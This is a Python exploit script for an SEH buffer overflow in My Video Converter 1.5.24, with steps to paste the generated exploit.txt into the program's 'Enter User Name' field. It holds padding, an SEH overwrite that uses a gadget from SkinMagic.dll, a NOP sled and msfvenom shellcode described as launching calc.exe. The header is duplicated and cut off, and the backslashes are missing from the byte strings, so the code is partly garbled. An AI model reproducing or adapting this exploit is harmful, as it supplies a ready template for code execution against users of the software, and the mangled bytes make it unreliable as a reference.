My Video Converter 1.5.24 Buffer Overflow

#!/usr/bin/env python

# Exploit Title : My Video Converter 1.5.24 - Remote Buffer Overflow
# Discovery by : Shubham Singh
# Known As : Spirited Wolf [Twitt #!/usr/bin/env python

# Exploit Title : My Video Converter 1.5.24 - Remote Buffer Overflow
# Discovery by : Shubham Singh
# Known As : Spirited Wolf [Twitter: @Pwsecspirit]
# Email : spiritedwolf@protonmail.com
# Youtube Channel : www.youtube.com/c/Pentestingwithspirit
# Discovey Date : 29/07/2018
# Software Link : http://www.divxtodvd.net/my_video_converter.exe
# Tested Version : 1.5.24
# Tested on OS : Windows XP Service Pack 3 x86
# Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt".
# Just copy the text inside "exploit.txt" and start the My Video Converter 1.5.24 program and click on "Register".
# In the third field i.e "Enter User Name" paste the content of "exploit.txt" and click on "OK". You will see a sweet calculator poped up.
# Greetz : @FuzzySec @LiveOverflow @hexachordanu

buffer = "x41" * 996
#Short Jump address
nseh = "xebx10x90x90"
#0x1002434b : pop ebp # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:Program FilesMy Video ConverterSkinMagic.dll)
seh= "x4Bx43x02x10"
nops = "x90" * 16

#badchar x00x0ax0d
#msfvenom -p windows/exec CMD=calc.exe -b 'x00x0ax0d' -f python
buf = ""
buf += "xbfx4dxb3x6bx1exdaxdaxd9x74x24xf4x58x33"
buf += "xc9xb1x31x31x78x13x83xe8xfcx03x78x42x51"
buf += "x9exe2xb4x17x61x1bx44x78xebxfex75xb8x8f"
buf += "x8bx25x08xdbxdexc9xe3x89xcax5ax81x05xfc"
buf += "xebx2cx70x33xecx1dx40x52x6ex5cx95xb4x4f"
buf += "xafxe8xb5x88xd2x01xe7x41x98xb4x18xe6xd4"
buf += "x04x92xb4xf9x0cx47x0cxfbx3dxd6x07xa2x9d"
buf += "xd8xc4xdex97xc2x09xdax6ex78xf9x90x70xa8"
buf += "x30x58xdex95xfdxabx1exd1x39x54x55x2bx3a"
buf += "xe9x6exe8x41x35xfaxebxe1xbex5cxd0x10x12"
buf += "x3ax93x1exdfx48xfbx02xdex9dx77x3ex6bx20"
buf += "x58xb7x2fx07x7cx9cxf4x26x25x78x5ax56x35"
buf += "x23x03xf2x3dxc9x50x8fx1fx87xa7x1dx1axe5"
buf += "xa8x1dx25x59xc1x2cxaex36x96xb0x65x73x68"
buf += "xfbx24xd5xe1xa2xbcx64x6cx55x6bxaax89xd6"
buf += "x9ex52x6exc6xeax57x2ax40x06x25x23x25x28"
buf += "x9ax44x6cx4bx7dxd7xecxa2x18x5fx96xba"
exploit = buffer + nseh + seh + nops + buf + "C" * (1000 - len(buffer) - 8 - len(nops) - len(buf))
f = open ("exploit.txt", "w")
f.write(exploit)
f.close()